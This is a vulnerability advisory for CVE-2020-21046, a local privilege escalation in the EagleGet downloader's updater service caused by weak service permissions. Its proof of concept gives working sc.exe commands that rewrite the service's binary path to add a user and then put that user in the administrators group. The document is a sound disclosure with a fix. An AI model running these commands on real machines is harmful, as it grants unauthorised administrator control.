EagleGet, a download manager application on Windows, version prior to v2.1.6.40 contains updater service which is vulnerable to weak service permission. The flaw ultimately leads to local privilege escalation.
Details:
[Name]: Local Privilege Escalation in EagleGet 2.1.5.20 Stable
[Description]: A local privilege escalation vulnerability was identified within the “luminati_net_updater_win_eagleget_com” service in EagleGet Downloader version 2.1.5.20 Stable. This issue allows authenticated non-administrative user to escalate their privilege and conduct code execution as a SYSTEM privilege.
[CVE Number]: CVE-2020–21046
[Affected Product Name]: EagleGet Downloader
[Affected Product Version]: 2.1.5.20 Stable
[Vulnerability Type]: Insecure Permissions
[Affected Component]: “luminati_net_updater_win_eagleget_com” service
[Attack Type]: Local
[Impact Code execution]: true
[Impact Escalation of Privileges]: true
[Attack Vectors]: Weak Service Permission
[Reference]: http://eagleget.com
[Discoverer]: Nipon Taikham
Proof of Concept:
For a quick check, screenshot below is the security permission for directory “C:\Program Files (x86)\EagleGet” . It shows that the group “Everyone” has “Special permissions” as same as the group “CREATOR OWNER”.
When rechecking the service permission with accesschk64.exe from Sysinternals.com and sc.exe built-in with Windows, below results can be observed.
Command:
accesschk64.exe -c luminati_net_updater_win_eagleget_com
Please note that the “RW” in front of the service name indicates that anyone on the machine can read and write service configuration.
Below command was used to check configuration of the service.
Command:
sc qc luminati_net_updater_win_eagleget_com
The result shows the service “luminati_net_updater_win_eagleget_com” can be started with “LocalSystem”. Chaining with the “RW” permission for “Everyone” above, an attacker can modify the configuration then start the service as “LocalSystem”.
The screenshots below demonstrate the example exploitation to create a new account by using editing the binary path.
Using below command, the list of user within the system will be listed.
net users
Please note that there are only 4 accounts found on the machine.
Back to the vulnerable service. Using below command to change the binary path of the update service to something maliciously, adding new user.
Command:
sc config luminati_net_updater_win_eagleget_com binpath=“net user testuser P@ssw0rd! /add”
Then start the service to let the command to be executed.
Command:
sc start luminati_net_updater_win_eagleget_com
The status of the service starting process was FAILED because the binary path does not really exist but it is a malicious command that we had just modified.
Please note that the user ‘testuser’ was already created as shown. This mean everyone on this machine can execute any command with the highest rights on the local machine.
By using the same step above but modify the binary path a bit, a local attacker can add the created user into administrative group as shown below.
Command:
sc config luminati_net_updater_win_eagleget_com binpath=”net localgroup administrators testuser /add”
As a result, the “user” that has only standard user privilege is able to exploit the vulnerable service to add a new user “testuser” that has administrative privilege.
Fixed: Update the EagleGet to the latest version.
